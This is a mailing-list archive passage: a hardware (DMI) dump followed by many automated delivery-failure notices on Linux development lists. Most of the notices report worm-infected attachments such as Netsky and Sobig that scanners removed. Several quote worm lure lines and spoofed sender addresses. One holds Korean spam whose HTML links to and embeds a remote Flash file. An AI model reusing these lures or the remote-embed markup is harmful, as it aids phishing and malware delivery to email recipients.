	L3 Cache Handle: Not Provided
	Serial Number: Not Specified
	Asset Tag: Not Specified
	Part Number: Not Specified

Handle 0x0005, DMI type 7, 19 bytes
Cache Information
	Socket Designation: L1 Cache
	Configuration: Enabled, Socketed, Level 1
	Operational Mode: Write Back
	Location: Internal
	Installed Size: 16 KB
	Maximum Size: 16 KB
	Supported SRAM Types:
		Burst
		Pipeline Burst
		Asynchronous
	Installed SRAM Type: Asynchronous
	Speed: Unknown
	Error Correction Type: Unknown
	System Type: Unknown
	Associativity: Unknown

Handle 0x0006, DMI type 7, 19 bytes
Cache Information
	Socket Designation: L2 Cache
	Configuration: Enabled, Socketed, Level 2
	Operational Mode: Write Back
	Location: External
	Installed Size: 1024 KB
	Maximum Size: 512 KB
	Supported SRAM Types:
		Burst
		Pipeline Burst
		Asynchronous
	Installed SRAM Type: Burst
	Speed: Unknown
	Error Correction Type: Unknown
	System Type: Unknown
	Associativity: Unknown

Handle 0x0007, DMI type 8, 9 bytes
Port Connector Information
	Internal Reference Designator: J19
	Internal Connector Type: 9 Pin Dual Inline (pin 10 cut)
	External Reference Designator: COM 1
	External Connector Type: DB-9 male
	Port Type: Serial Port 16550A Compatible

Handle 0x0008, DMI type 9, 13 bytes
System Slot Information
	Designation: PCI Slot J8B1
	Type: 32-bit PCI
	Current Usage: Unknown
	Length: Long
	ID: 0
	Characteristics:
		5.0 V is provided
		3.3 V is provided

Handle 0x0009, DMI type 9, 13 bytes
System Slot Information
	Designation: PCI Slot J9B1
	Type: 32-bit PCI
	Current Usage: Unknown
	Length: Long
	ID: 0
	Characteristics:
		5.0 V is provided
		3.3 V is provided

Handle 0x000A, DMI type 9, 13 bytes
System Slot Information
	Designation: PEG Slot J6C1
	Type: 32-bit PCI Express
	Current Usage: In Use
	Length: Long
	ID: 6
	Characteristics:
		5.0 V is provided
		3.3 V is provided

Handle 0x000B, DMI type 9, 13 bytes
System Slot Information
	Designation: PCI Express Slot J7C1
	Type: 32-bit PCI Express
	Current Usage: Available
	Length: Long
	ID: 8
	Characteristics:
		5.0 V is provided
		3.3 V is provided

Handle 0x000C, DMI type 9, 13 bytes
System Slot Information
	Designation: PCI Express Slot J8C1
	Type: 32-bit PCI Express
	Current Usage: Available
	Length: Long
	ID: 10
	Characteristics:
		5.0 V is provided
		3.3 V is provided

Handle 0x000D, DMI type 10, 6 bytes
On Board Device Information
	Type: Sound
	Status: Disabled
	Description: HD-Audio

Handle 0x000E, DMI type 11, 5 bytes
OEM Strings
	String 1: This is the Intel Calistoga
	String 2: Chipset CRB Platform

Handle 0x000F, DMI type 12, 5 bytes
System Configuration Options
	Option 1: Jumper settings can be described here.

Handle 0x0010, DMI type 16, 15 bytes
Physical Memory Array
	Location: System Board Or Motherboard
	Use: System Memory
	Error Correction Type: None
	Maximum Capacity: 2 GB
	Error Information Handle: Not Provided
	Number Of Devices: 2

Handle 0x0011, DMI type 17, 27 bytes
Memory Device
	Array Handle: 0x0010
	Error Information Handle: No Error
	Total Width: 32 bits
	Data Width: 32 bits
	Size: 1024 MB
	Form Factor: SODIMM
	Set: 1
	Locator: M1
	Bank Locator: Bank 0
	Type: DDR2
	Type Detail: Synchronous
	Speed: Unknown
	Manufacturer: Not Specified
	Serial Number: Not Specified
	Asset Tag: Not Specified
	Part Number: Not Specified

Handle 0x0012, DMI type 17, 27 bytes
Memory Device
	Array Handle: 0x0010
	Error Information Handle: No Error
	Total Width: 32 bits
	Data Width: 32 bits
	Size: 1024 MB
	Form Factor: SODIMM
	Set: 1
	Locator: M2
	Bank Locator: Bank 1
	Type: DDR2
	Type Detail: Synchronous
	Speed: Unknown
	Manufacturer: Not Specified
	Serial Number: Not Specified
	Asset Tag: Not Specified
	Part Number: Not Specified

Handle 0x0013, DMI type 19, 15 bytes
Memory Array Mapped Address
	Starting Address: 0x00000000000
	Ending Address: 0x0007FFFFFFF
	Range Size: 2 GB
	Physical Array Handle: 0x0010
	Partition Width: 0

Handle 0x0014, DMI type 20, 19 bytes
Memory Device Mapped Address
	Starting Address: 0x00000000000
	Ending Address: 0x0003FFFFFFF
	Range Size: 1 GB
	Physical Device Handle: 0x0011
	Memory Array Mapped Address Handle: 0x0013
	Partition Row Position: Unknown
	Interleave Position: Unknown
	Interleaved Data Depth: Unknown

Handle 0x0015, DMI type 20, 19 bytes
Memory Device Mapped Address
	Starting Address: 0x00040000000
	Ending Address: 0x0007FFFFFFF
	Range Size: 1 GB
	Physical Device Handle: 0x0012
	Memory Array Mapped Address Handle: 0x0013
	Partition Row Position: Unknown
	Interleave Position: Unknown
	Interleaved Data Depth: Unknown

Handle 0x0016, DMI type 32, 20 bytes
System Boot Information
	Status: <OUT OF SPEC>

Handle 0x0017, DMI type 129, 16 bytes
OEM-specific Type
	Header and Data:
		81 10 17 00 01 01 02 01 00 00 00 01 06 01 00 01
	Strings:
		Intel_ASF_001
		Intel_ASF_001

Handle 0x0018, DMI type 136, 6 bytes
OEM-specific Type
	Header and Data:
		88 06 18 00 FF FF

Handle 0x0019, DMI type 150, 14 bytes
OEM-specific Type
	Header and Data:
		96 0E 19 00 01 01 00 00 00 00 00 00 00 00
	Strings:
		ABSOLUTE(PHOENIX) CLM

Handle 0x001A, DMI type 200, 7 bytes
OEM-specific Type
	Header and Data:
		C8 07 1A 00 01 02 03
	Strings:
		17C0
		
		0001

Handle 0x001B, DMI type 127, 4 bytes
End Of Table

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2007-08-03  6:22 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2007-08-03  6:22 UTC (permalink / raw)
  To: virtualization


[-- Attachment #1.1: Type: text/plain, Size: 187 bytes --]

The following message to <virtualjlbenitezr@itesm.mx> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'RCPT TO:<virtualjlbenitezr@itesm.mx> User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 297 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 6795 bytes --]

[-- Attachment #1.3.1: Type: text/html, Size: 5660 bytes --]

From: admin@tradeking.com <virtualjlbenitezr@itesm.mx>
To: <virtualjlbenitezr@itesm.mx>
Subject: RE: Weekly News
Message-ID: <20070803171603.16541.qmail@Roman>

[-- Attachment #2: Type: text/plain, Size: 184 bytes --]

_______________________________________________
Virtualization mailing list
Virtualization@lists.linux-foundation.org
https://lists.linux-foundation.org/mailman/listinfo/virtualization

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2007-05-31 21:26 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2007-05-31 21:26 UTC (permalink / raw)
  To: nfs


[-- Attachment #1.1: Type: text/plain, Size: 137 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       nfrkanec@nn.hr




[-- Attachment #1.2: Type: message/delivery-status, Size: 199 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 5847 bytes --]

[-- Attachment #1.3.1: Type: text/html, Size: 5071 bytes --]

From: admin@scottrade.com <nfrkanec@nn.hr>
To: <nfrkanec@nn.hr>
Subject: RE: Top-Alert
Date: 31 May 2007 23:26:53 +0200
Message-ID: <20070531012657.2833.qmail@pc-149-50-44-190.cm.vtr.net>

[-- Attachment #2: Type: text/plain, Size: 286 bytes --]

-------------------------------------------------------------------------
This SF.net email is sponsored by DB2 Express
Download DB2 Express C - the FREE version of DB2 express and take
control of your XML. No limits. Just data. Click to get it now.
http://sourceforge.net/powerbar/db2/

[-- Attachment #3: Type: text/plain, Size: 140 bytes --]

_______________________________________________
NFS maillist  -  NFS@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/nfs

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2007-05-18 17:46 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2007-05-18 17:46 UTC (permalink / raw)
  To: linux-pm


[-- Attachment #1.1: Type: text/plain, Size: 136 bytes --]

The following message to <wisper@crl.com> was undeliverable.
The reason for the problem:
5.1.1 - Bad destination email address 'reject'

[-- Attachment #1.2: Type: message/delivery-status, Size: 221 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 639 bytes --]

[-- Attachment #1.3.1: Type: multipart/mixed, Size: 1 bytes --]

From: linux-pm@lists.osdl.org
To: wisper@crl.com
Subject: Returned mail: see transcript for details
Date: Fri, 18 May 2007 11:46:44 -0600

[-- Attachment #1.4: Type: text/plain, Size: 0 bytes --]



^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2006-12-05  7:09 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2006-12-05  7:09 UTC (permalink / raw)
  To: alsa-devel


[-- Attachment #1.1: Type: text/plain, Size: 229 bytes --]

The following message to <olivier.coulaud@loria.fr> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'<olivier.coulaud@loria.fr>: Recipient address rejected: User unknown in local recipient table'

[-- Attachment #1.2: Type: message/delivery-status, Size: 318 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2038 bytes --]

[-- Attachment #1.3.1.1: Type: text/plain, Size: 180 bytes --]

The attached message may be infected with a Virus.
The original message information was:

From: alsa-devel@lists.sourceforge.net
To: olivier.coulaud@loria.fr
Subject: Answer

[-- Attachment #1.3.1.2: ModifiedMessage.txt --]
[-- Type: message/rfc822, Size: 997 bytes --]

[-- Attachment #1.3.1.2.1.1: Type: text/plain, Size: 53 bytes --]


Hello!
Please have a look at the answer.
Thank you


[-- Attachment #1.3.1.2.1.2: Removed Attachment --]
[-- Type: text/plain, Size: 161 bytes --]

This attachment contained a virus and was stripped.
	Filename: answer6.pif
	Content-Type: application/octet-stream
	Virus(es): W32/Netsky-T
		W32/Sality-AA

[-- Attachment #2: Type: text/plain, Size: 347 bytes --]

-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys - and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV

[-- Attachment #3: Type: text/plain, Size: 161 bytes --]

_______________________________________________
Alsa-devel mailing list
Alsa-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/alsa-devel

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2005-12-05 23:50 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2005-12-05 23:50 UTC (permalink / raw)
  To: alsa-devel

[-- Attachment #1: Type: text/plain, Size: 147 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       3Djohan.beaard@hetnet.nl




[-- Attachment #2: Type: message/delivery-status, Size: 198 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 3010 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 302 bytes --]

Deze e-mail is door E-mail Virus Scan van Het Net gecontroleerd op virussen. Zie voor meer informatie: http://www.hetnet.nl/evs/

Een aan u verstuurd e-mail bericht bevatte het virus W32.Sober.X@mm!zip in het bestand mailtext.zip. Dit bestand is verwijderd omdat het virus niet verwijderd kon worden.


[-- Attachment #3.1.2: Type: message/rfc822, Size: 977 bytes --]

[-- Attachment #3.1.2.1.1: Type: text/plain, Size: 176 bytes --]

hey its me, my old address dont work at time. i dont know why?!
in the last days ive got some mails. i' think thaz your mails but im not sure!

plz read and check ...
cyaaaaaaa

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2005-11-23 20:37 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2005-11-23 20:37 UTC (permalink / raw)
  To: alsa-devel

[-- Attachment #1: Type: text/plain, Size: 141 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       avi@shutterfly.com




[-- Attachment #2: Type: message/delivery-status, Size: 217 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1001 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 23 bytes --]

Medical Labs Exames!!!

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2005-02-13 17:37 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2005-02-13 17:37 UTC (permalink / raw)
  To: alsa-devel

[-- Attachment #1: Type: text/plain, Size: 144 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       jic8361@mobiart.co.kr




[-- Attachment #2: Type: message/delivery-status, Size: 201 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 3076 bytes --]

[-- Attachment #3.1.1.1: Type: text/plain, Size: 479 bytes --]

µ· ÇÑǬ ¾ÈµéÀÌ°í ¿îÁøÄÚ¿þÀ=CC¸¦ À常ÇÑ´Ù?
¼³Ä¡ºñ¿ë °ÆÁ¤ ³¡?
¼³Ä¡ºñ, º¸Áõ±Ý, °í°´ºÎ´ã±Ý 0=BFø?
¹ØÁ®¾ß º»Àü...ÀÌÁÖµ¿¾È °øÂ¥=B7Î ÀÌ¿ë?
±ñ±ñÇÑ Á¤¼ö±â ¿õÁøÄÚ¿þÀÌ ¹=AB·áüÇè À̺¥Æ®!!
<p><a href="http://my.netian.com/~killjames/woo.htm" target="_self"><span style="font-size:9pt;">¹«·á±¸°æÇϱâ</span></a></p>
À̹ÌÁö°¡ ¾Èº¸ÀÌ½Ã¸é ¾Æ·¡ À=CC¹ÌÁöº¸±â¸¦ Ŭ¸¯Çϼ¼¿ä!!
<p align="center"><EMBED src="http://my.netian.com/~killjames/woo.swf" width="10" height="10"></p>
<br>buxekljfoam

[-- Attachment #3.1.1.2: Type: text/html, Size: 479 bytes --]

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-11-30 11:17 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-11-30 11:17 UTC (permalink / raw)
  To: alsa-devel

[-- Attachment #1: Type: text/plain, Size: 145 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       crawford@syngistix.com




[-- Attachment #2: Type: message/delivery-status, Size: 203 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1488 bytes --]

[-- Attachment #3.1: Type: text/html, Size: 652 bytes --]

From: Alsa-devel <alsa-devel@alsa-project.org>
To: Crawford <crawford@syngistix.com>
Subject: Hi Crawford
Date: Mon, 29 Nov 2004 18:27:00 +0000
Message-ID: <1E7BE4ILB93K42GJ@alsa-project.org>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-08-03 14:02 Test Person2
  0 siblings, 0 replies; 183+ messages in thread
From: Test Person2 @ 2004-08-03 14:02 UTC (permalink / raw)
  To: acpi-devel-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f

[-- Attachment #1: Type: text/plain, Size: 511 bytes --]

Your message

  To:      bob.dunlop-AP8L3A0T/wQqdlJmJB21zg@public.gmane.org
  Subject: Re: Hello
  Sent:    Tue, 3 Aug 2004 15:02:17 +0100

did not reach the following recipient(s):

bob.dunlop-AP8L3A0T/wQqdlJmJB21zg@public.gmane.org on Tue, 3 Aug 2004 15:02:22 +0100
    The e-mail account does not exist at the organization this message
was sent to.  Check the e-mail address, or contact the recipient
directly to find out the correct address.
    <GENERAL.hq.farsitecommunications.com #5.1.1>


[-- Attachment #2: Type: message/delivery-status, Size: 298 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 2111 bytes --]

[-- Attachment #3.1.1.1: Type: text/plain, Size: 28 bytes --]

Your document is attached.

[-- Attachment #3.1.1.2: Type: text/html, Size: 375 bytes --]

[-- Attachment #3.1.2: Quarantined Attachment Report --]
[-- Type: text/plain, Size: 163 bytes --]

Your attachment "your_picture.pif" contained virus:
         "W32.Netsky.K@mm".

It was quarantined and replaced with this text file.

ID:GENERAL::SYQ4f004916

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-07-11  6:06 adsadnbs
  0 siblings, 0 replies; 183+ messages in thread
From: adsadnbs @ 2004-07-11  6:06 UTC (permalink / raw)
  To: netdev

[-- Attachment #1: Type: text/plain, Size: 447 bytes --]

Your message

  To:      whuh@applieddata.net
  Subject: Re: Hello
  Sent:    Sun, 11 Jul 2004 02:12:29 -0400

did not reach the following recipient(s):

whuh@applieddata.net on Sun, 11 Jul 2004 02:06:23 -0400
    The e-mail account does not exist at the organization this message
was sent to.  Check the e-mail address, or contact the recipient
directly to find out the correct address.
    <ads-ex01.applieddata.net #5.1.1>


[-- Attachment #2: Type: message/delivery-status, Size: 214 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1365 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 36 bytes --]

See the attached file for details.

[-- Attachment #3.1.2: Deleted Attachment Report --]
[-- Type: text/plain, Size: 238 bytes --]

ÿþS\0y\0m\0a\0n\0t\0e\0c\0 \0A\0V\0F\0 \0r\0e\0p\0l\0a\0c\0e\0d\0 \0y\0o\0u\0r\0_\0p\0i\0c\0t\0u\0r\0e\0.\0p\0i\0f\0 \0w\0i\0t\0h\0 \0t\0h\0i\0s\0 \0t\0e\0x\0t\0 \0m\0e\0s\0s\0a\0g\0e\0.\0 \0 \0T\0h\0e\0 \0o\0r\0i\0g\0i\0n\0a\0l\0 \0f\0i\0l\0e\0 \0c\0o\0n\0t\0a\0i\0n\0e\0d\0 \0a\0 \0v\0i\0r\0u\0s\0 \0a\0n\0d\0 \0w\0a\0s\0 \0d\0e\0l\0e\0t\0e\0d\0.\0\r\0
\0

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-05-12 12:56 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-05-12 12:56 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 150 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       //sven_dietrich@trimble.com




[-- Attachment #2: Type: message/delivery-status, Size: 226 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 2036 bytes --]

[-- Attachment #3.1.1.1: Type: text/plain, Size: 0 bytes --]



[-- Attachment #3.1.2: InterScan_SafeStamp.txt --]
[-- Type: text/plain, Size: 425 bytes --]

****** Message from InterScan E-Mail VirusWall NT ******

** WARNING! Attached file noname.htm contains:

     HTML_Netsky.P virus

   Attempted to clean the file but it is not cleanable.
   It has been deleted.
** WARNING! Attached file message.scr contains:

     WORM_NETSKY.P virus

   Attempted to clean the file but it is not cleanable.
   It has been deleted.
*****************     End of message     ***************


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-05-12  9:46 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-05-12  9:46 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 146 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       mike.stephens@intel.com




[-- Attachment #2: Type: message/delivery-status, Size: 220 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 2201 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 497 bytes --]


Protected Mail System Test.



===========================================================================
WARNING:In accordance with Intel's security policy this email
has been modified.

The file attachment data.rtf                                                                           .scr is a restricted file type and has been removed from
 the following message: Re: Extended Mail.  If you require this file, please contact the sender
 and arrange an alternate means of receiving it.



^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-04-27 14:35 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-04-27 14:35 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 144 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       jung-ik.lee@intel.com




[-- Attachment #2: Type: message/delivery-status, Size: 218 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 2249 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 37 bytes --]

Please read the important document.


[-- Attachment #3.1.2: DELETED0.TXT --]
[-- Type: text/plain, Size: 248 bytes --]

File attachment: product_jung-ik.lee.zip
A file attached to this email was removed
because it was infected with a virus.

Result: Virus Detected
Virus Name: W32.Netsky.P@mm
File Attachment: product_jung-ik.lee.zip
Attachment Status: deleted

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-04-08  4:10 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-04-08  4:10 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 151 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       szemethy.tivadar@synergon.hu




[-- Attachment #2: Type: message/delivery-status, Size: 216 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 3089 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 102 bytes --]

Here is the website. ;-)

+++ Attachment: No Virus found
+++ Kaspersky AntiVirus - www.kaspersky.com


[-- Attachment #3.1.2: DELETED0.TXT --]
[-- Type: text/plain, Size: 257 bytes --]

(SMTP) File attachment: www.freeporn4all.zip
A file attached to this email was removed
because it was infected with a virus.

Result: Virus Detected
Virus Name: W32.Netsky.P@mm
File Attachment: www.freeporn4all.zip
Attachment Status: deleted

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-03-29 10:33 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-03-29 10:33 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 139 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       joma@telindus.be




[-- Attachment #2: Type: message/delivery-status, Size: 189 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 931 bytes --]

[-- Attachment #3.1: Type: multipart/related, Size: 194 bytes --]

From: linux-fbdev-devel@lists.sourceforge.net
To: joma@telindus.be
Subject: Mail Delivery (failure joma@telindus.be)
Date: Mon, 29 Mar 2004 12:34:41 +0200
Message-ID: <TBE3MX1rcR4ZDgC81Tb00000024@tbe3mx1.telindus.intra>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2004-03-15 19:16 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2004-03-15 19:16 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 143 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       don.dugger@intel.com




[-- Attachment #2: Type: message/delivery-status, Size: 217 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 2202 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 13 bytes --]

love letter?

[-- Attachment #3.1.2: DELETED0.TXT --]
[-- Type: text/plain, Size: 232 bytes --]

File attachment: mails_yours.zip
A file attached to this email was removed
because it was infected with a virus.

Result: Virus Detected
Virus Name: W32.Netsky.C@mm
File Attachment: mails_yours.zip
Attachment Status: deleted

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2003-09-01 21:42 postmaster-a6Zz2GAMxShWk0Htik3J/w
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-a6Zz2GAMxShWk0Htik3J/w @ 2003-09-01 21:42 UTC (permalink / raw)
  To: acpi-devel-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f

[-- Attachment #1: Type: text/plain, Size: 166 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       csh-wdzih1iHtSi9dxLkCovUHA@public.gmane.org




[-- Attachment #2: Type: message/delivery-status, Size: 226 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1852 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 33 bytes --]

See the attached file for details

[-- Attachment #3.1.2: Type: text/plain, Size: 109 bytes --]

We have removed document_9446.pif from this email because it is not part of Optibase content security policy.

[-- Attachment #3.1.3: Type: text/plain, Size: 109 bytes --]

We have removed document_9446.pif from this email because it is not part of Optibase content security policy.

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2003-09-01 21:31 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2003-09-01 21:31 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 143 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       csh@viewgraphics.com




[-- Attachment #2: Type: message/delivery-status, Size: 203 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1715 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 33 bytes --]

See the attached file for details

[-- Attachment #3.1.2: Type: text/plain, Size: 109 bytes --]

We have removed document_9446.pif from this email because it is not part of Optibase content security policy.

[-- Attachment #3.1.3: Type: text/plain, Size: 109 bytes --]

We have removed document_9446.pif from this email because it is not part of Optibase content security policy.

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2003-08-31  1:33 postmaster-GvrGQ0sgSj//MRS1mQlstNa2gSz7necR9FMPySWZwLkb1SvskN2V4Q
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-GvrGQ0sgSj//MRS1mQlstNa2gSz7necR9FMPySWZwLkb1SvskN2V4Q @ 2003-08-31  1:33 UTC (permalink / raw)
  To: acpi-devel-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f

[-- Attachment #1: Type: text/plain, Size: 189 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       inf1p-8gU7mq檞덬࿶靹㰛ݮ蟤ⰴ즲㖡康斀@public.gmane.org




[-- Attachment #2: Type: message/delivery-status, Size: 276 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 2744 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 178 bytes --]

Warning: This message has had one or more attachments removed.
Warning: Please read the "VirusWarning.txt" attachment(s) for more information.

See the attached file for details

[-- Attachment #3.1.2: VirusWarning.txt --]
[-- Type: text/plain, Size: 777 bytes --]

This is a message from the MailScanner E-Mail Virus Protection Service
----------------------------------------------------------------------
The original e-mail attachment "document_9446.pif"
was believed to be infected by a virus and has been replaced by this warning
message.

If you wish to receive a copy of the *infected* attachment, please
e-mail helpdesk and include the whole of this message
in your request. Alternatively, you can call them, with
the contents of this message to hand when you call.

At Sun Aug 31 03:33:48 2003 the virus scanner said:
   >>> Virus 'W32/Sobig-F' found in file ./h7V1Xh0s021481/document_9446.pif

Note to Help Desk: Look on the MailScanner in /var/spool/mailscanner/quarantine (message h7V1Xh0s021481).
-- 
Postmaster

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2003-08-27 22:58 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2003-08-27 22:58 UTC (permalink / raw)
  To: linux-fbdev-devel

[-- Attachment #1: Type: text/plain, Size: 143 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       csh@viewgraphics.com




[-- Attachment #2: Type: message/delivery-status, Size: 204 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1712 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 41 bytes --]

Please see the attached file for details.

[-- Attachment #3.1.2: Type: text/plain, Size: 104 bytes --]

We have removed your_document.pif from this email because it is not part of our content security policy.

[-- Attachment #3.1.3: Type: text/plain, Size: 104 bytes --]

We have removed your_document.pif from this email because it is not part of our content security policy.

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2003-08-21 20:59 postmaster-YNHfkfoICe87lZ9V/NTDHw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-YNHfkfoICe87lZ9V/NTDHw @ 2003-08-21 20:59 UTC (permalink / raw)
  To: acpi-devel-5NWGOfrQmneRv+LV9MX5uipxlwaOVQ5f

[-- Attachment #1: Type: text/plain, Size: 168 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       abuse-PkbjNfxxIARBDgjK7y7TUQ@public.gmane.org




[-- Attachment #2: Type: message/delivery-status, Size: 221 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1318 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 33 bytes --]

See the attached file for details

[-- Attachment #3.1.2: Type: text/plain, Size: 184 bytes --]


------------------  Virus Warning Message (on the network)

wicked_scr.scr is removed from here because it contains a virus.

---------------------------------------------------------

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2003-07-01 14:47 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2003-07-01 14:47 UTC (permalink / raw)
  To: linux-mips

[-- Attachment #1: Type: text/plain, Size: 145 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       17208881000@level3.com




[-- Attachment #2: Type: message/delivery-status, Size: 225 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 1944 bytes --]

[-- Attachment #3.1.1: Type: text/plain, Size: 433 bytes --]

------------------  Virus / Macro Warning Message (on f1ee40-20.idc1.level3.com)

Found virus WORM_SOBIG.E in file details.pif (in your_details.zip)
The uncleanable file your_details.zip is moved to /etc/iscan/virus/virEEDGPaq1q.

